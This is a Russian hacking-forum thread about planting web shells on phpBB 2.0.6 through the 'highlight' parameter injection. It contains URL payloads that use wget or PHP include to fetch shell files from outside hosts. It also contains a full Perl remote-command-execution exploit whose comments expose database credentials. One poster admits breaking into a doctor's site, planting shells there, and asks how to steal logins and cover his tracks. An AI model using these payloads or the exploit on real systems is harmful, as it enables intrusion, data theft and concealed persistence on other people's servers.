Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Заливка шелла на phpBB 2.0.6 через highlights (https://forum.antichat.xyz/showthread.php?t=12565)

ded2006 07.01.2006 00:09
Заливка шелла на phpBB 2.0.6 через highlights
 
Здравствуйте житили античата,я квам пришол с такой проблемой...прошу мою проблему не отвергать а ответить на нее...
Есть форум phpBB 2.0.6 уязвим но как тока я хочю залить на него шелл вот такой команндой:
&highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/
то оно сначала грузит грузит а потом резко остонавлеваеться и неможет загрузить,я думал что оно шелл залило хахожу по ссылки www.site.ru/forum/remview.php а сайт говорит что такого файла нету,значит выходит с этого что шелл НЕ ЗАЛИЛСЯ !!!
и еще когда пробую GET заливать тоже самое..
Ответте мне на токую проблему пожалуста....:)
как можно прито-ком залить шелл ???

DRON-ANARCHY 07.01.2006 00:21
Ну...вы, батенька, напишите адресок форума, а мы (я точно) постараемся вам в этом "нелёгком" деле помочь. Пиши хотя бы в асю, если тут боязно.


Кстати, кто сказал, что там WGET работает???

Azazel 07.01.2006 01:07
Цитата:
Сообщение от ded2006
&highlight=%2527.$poster=`$cmd`.%2527&cmd=wget xxxx.x.xx/remview.php -P home/www/forum/
Если wget работает
wget -o home/www/forum/Nazvanie_Faila.php http://xxxx.x.xx/remview.php

Плюс попробуй изменить расширение шелла на твоём сайте на txt.

Grrl 07.01.2006 03:12
проверь какая качалка стоит на сайте which wget (curl,get,fetch) посмотри какие у тебя права (id) и убедись что папка в которую хочешь залить шелл открыта для записи,проверь правильность пути куда будешь заливать ессли в другую папку.
и воще remview.php имхо ужанно неудобный шел лучше заюзать c99 или последнюю версию r57.

cardons 07.01.2006 06:44
http://razrushitel.front.ru/frm.html
Это не то?

Azazel 07.01.2006 13:27
Цитата:
Сообщение от cardons
Конечно это то, вон там пример использования get. Ещё про комманды можно прочитать тут http://forum.antichat.ru/thread7345.html

N1ckeZ 07.01.2006 14:24
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
Вот тебе блин все что хочешь ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
Код:
#!/usr/bin/perl
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname  = "ccteam_phpbb2";
## $dbuser  = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if ( @ARGV < 4)
 {
 print q(############################################################
    phpBB <=2.0.10 remote command execution exploit
        by RusH security team // www.rst.void.ru
############################################################
 usage:
 r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la"
############################################################
 ); 
 exit;
 }

$serv  = $ARGV[0];
$dir  = $ARGV[1];
$topic = $ARGV[2];
$cmd  = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]
CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###
Качай Активе перд и пользуйся. Не ломай бошку всякими загрузками шелла

Utochka 07.01.2006 20:34
Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al

Dark Angel 07.01.2006 22:03
Цитата:
Сообщение от cardons
cardons ето старый его форум!!!вот смотри здесь
http://www.rcw-team.ru/hack/

DRON-ANARCHY 07.01.2006 23:50
Цитата:
Заливай так GET http://твой_сервер/шелл.php>shell.php;ls -al
Сначала читай посты, прежде чем писать.
Цитата:
ded2006 епт используй эксплоит все будут работать и к 10 и к 15 и 18 версиям!
Сплойт работает ДО 10 ВЕРСИИ ВКЛЮЧИТЕЛЬНО. причем этот сплойт там не работает.
Цитата:
Конечно это то, вон там пример использования get. Ещё про комманды можно прочитать тут http://forum.antichat.ru/thread7345.html
Есть более хорошая статья, но не всем доступна...

Dark Angel 08.01.2006 03:13
dron-anarchy ты про чо???
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть

DRON-ANARCHY 09.01.2006 08:51
Цитата:
а ешё один вопрос сплоит рабочий или его нухно дароботать тоесть исправеть
Дык..вроде рабочий. а ты не пытался его запустиить?=))))

ShAnKaR 10.01.2006 20:54
Бу
 
вот ребята а что вы будете делать если на php safe mode, и нельзя команды выполнять? вот чтоб подобных траблов не было, проще сразу проинклудить вебшел. Так как видно что бага представляет собой php injection, делаем типа так:
Цитата:
....&highlight=%2527.include(\$_GET[qqq]).%2527&qqq=http://blablabla.narod.ru/shell.php?

qBiN 11.01.2006 00:46
Цитата:
Так как видно что бага представляет собой php injection, делаем типа так:
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)

ShAnKaR 11.01.2006 00:56
Цитата:
Сообщение от qBiN
Если поднятся выше,то баг-mysql-inj а уже с помощью mysql-inj получает выполнение пхп скриптов +)
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)

ZaCo 11.01.2006 01:03
а я ниче непонял=))) qBiN да если у него и так команды выполняются то нах скуль ему тем более как mysql позволит выполнить пхп команды??=)) и во-вторых бага там в хреновом использовании eval() =)))

ShAnKaR 11.01.2006 01:24
Цитата:
Сообщение от ZaCo
и во-вторых бага там в хреновом использовании eval() =)))
вот сейчас специально для вас двоих- zaco и qbin, потрудился нашел старую версию phpbb , и вот представляю вам на обозрение тот самый уязвимый код из файла viewtopic.php:

PHP код:
$highlight_match $highlight '';
if (isset($HTTP_GET_VARS['highlight']))
{
    // Split words and phrases
    $words explode(' 'trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

    for($i 0$i sizeof($words); $i++)
    {
        if (trim($words[$i]) != '')
        {
            $highlight_match .= (($highlight_match != '') ? '|' '') . str_replace('*''\w*'$words[$i]);
        }
    }
    unset($words);

    $highlight urlencode($HTTP_GET_VARS['highlight']);

PHP код:
if ($highlight_match)
    {
        // This was shamelessly 'borrowed' from volker at multiartstudio dot de
        // via php.net's annotated manual
        $message str_replace('\"''"'substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se'"preg_replace('#\b(" $highlight_match ")\b#i', '<span style=\"color:#" $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')"'>' $message '<'), 1, -1));
    } 
теперьто вы мне поверите?

ZaCo 11.01.2006 01:35
нене ты думаешь как код выполняется? прег репласе - первая ошибка... а там уже в eval выполняется, ну эт конечно правильно если бы регулярные выражения грамматно настроили то все было бы безопасно+)))... просто имхо eval вообще опасная штука=)

ShAnKaR 11.01.2006 01:59
Цитата:
Сообщение от ZaCo
нене ты думаешь как код выполняется?
я не думаю , я знаю- preg_replace с модификатором e

qBiN 11.01.2006 11:08
Цитата:
mysql-inj это как? если не ошибаюсь то баг там в хреновом использовании preg_replace() ++)
Просто я подумал о том что используется двойное кодирование апострофа-%2527 :-)

ShAnKaR 11.01.2006 17:20
Цитата:
Сообщение от qBiN
Просто я подумал :-)
В следующий раз хорошо подумай, прежде чем что-то утверждать.

Dark Angel 12.01.2006 04:03
кароче бахнул сайт каковата врача сплойтом каторый находится в етой теме!!!!и теперь проблема как найти его даные ну тоесть ник и пасс
народ обясните где в phpbb 2.0.6 храница ето дабро
и ешё один вапрос,можна ли какнить Шелл стереть я записал другой Шелл в другую дерикторию а каторым ползуюсь мне ненадо,темболе их там 153 штук сразу заметно!!!!!!!вот и хочу пока он незаметил удалить их!!!!а другим ползеватся!!!
можна же через ftp но я незнаю логин и пароль
вот и спрашеваю у спецов!!! :) :confused:

Dark Angel 12.01.2006 07:29
а всё ненада!!!!слава ŅRST MySQL v(2.0) или как её название!!! очень класная штука!! и слава таму кто её предумал!!!!
чуть незабыл сплоит каторый здесь лежит там ошибка!!
каму надо стучитесь в аску!!!!дам!!!


Время: 20:43